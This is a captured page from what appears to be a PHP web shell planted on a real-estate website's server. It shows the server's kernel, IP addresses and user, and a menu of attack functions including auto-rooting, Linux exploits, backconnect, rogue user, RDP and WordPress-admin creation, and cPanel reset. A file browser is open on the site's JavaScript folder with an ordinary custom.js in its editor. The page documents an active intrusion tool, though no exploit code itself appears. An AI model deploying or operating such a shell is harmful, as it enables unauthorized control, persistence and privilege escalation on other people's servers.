Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.154.152
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
realestate /
source /
public /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
config.js
800
B
-rwxr-xr-x
custom.js
3.1
KB
-rwxr-xr-x
dashboards-analytics.js
9.4
KB
-rwxr-xr-x
extended-ui-perfect-scrollbar....
1.06
KB
-rwxr-xr-x
form-basic-inputs.js
188
B
-rwxr-xr-x
main.js
5.28
KB
-rwxr-xr-x
pages-account-settings-account...
852
B
-rwxr-xr-x
ui-modals.js
1.04
KB
-rwxr-xr-x
ui-popover.js
443
B
-rwxr-xr-x
ui-toasts.js
1.46
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom.js
$("#myTab button").on("click", function (e) { e.preventDefault(); e.stopPropagation(); // Stop event bubbling }); // Allow navigation only via jQuery buttons $("#add-address-btn").click(function (e) { e.preventDefault(); var nextTab = new bootstrap.Tab($("#address-tab")); nextTab.show(); }); $("#add-contact-btn").click(function (e) { e.preventDefault(); var nextTab = new bootstrap.Tab($("#contact-tab")); nextTab.show(); }); $("#add-guarantor-btn").click(function (e) { e.preventDefault(); var nextTab = new bootstrap.Tab($("#disabled-tab")); nextTab.show(); }); $(document).ready(function () { // When "Select All" checkbox is clicked $(".all-property-select").click(function () { var isChecked = $(this).prop("checked"); // Get the checked status $(".property-checkbox").each(function () { $(this).prop("checked", isChecked); // Apply the same checked status to all checkboxes }); }); }); $(document).ready(function () { // When "Select All" checkbox is clicked $(".all-features-select").click(function () { var isChecked = $(this).prop("checked"); // Get the checked status $(".features-checkbox").each(function () { $(this).prop("checked", isChecked); // Apply the same checked status to all checkboxes }); }); }); document.addEventListener('DOMContentLoaded', function() { let createAccountRadio = document.getElementById('createAccountRadio'); let existingUserRadio = document.getElementById('existingUserRadio'); let doNotCreateAccountRadio = document.getElementById('doNotCreateAccountRadio'); let createAccountSection = document.getElementById('createAccountSection'); let existingUserSection = document.getElementById('existingUserSection'); function toggleSections() { if (createAccountRadio.checked) { createAccountSection.classList.add('show'); existingUserSection.classList.remove('show'); } else if (existingUserRadio.checked) { existingUserSection.classList.add('show'); createAccountSection.classList.remove('show'); } else if (doNotCreateAccountRadio.checked) { createAccountSection.classList.remove('show'); existingUserSection.classList.remove('show'); } } createAccountRadio.addEventListener('change', toggleSections); existingUserRadio.addEventListener('change', toggleSections); doNotCreateAccountRadio.addEventListener('change', toggleSections); }); document.getElementById('uploadFileArea').addEventListener('click', function() { document.getElementById('fileInput').click(); }); document.getElementById('fileInput').addEventListener('change', function() { let files = this.files; let fileNames = []; if (files.length > 0) { for (let i = 0; i < files.length; i++) { fileNames.push(files[i].name); } document.getElementById('fileName').textContent = `Selected file(s): ${fileNames.join(', ')}`; } else { document.getElementById('fileName').textContent = "No file selected"; } });
Close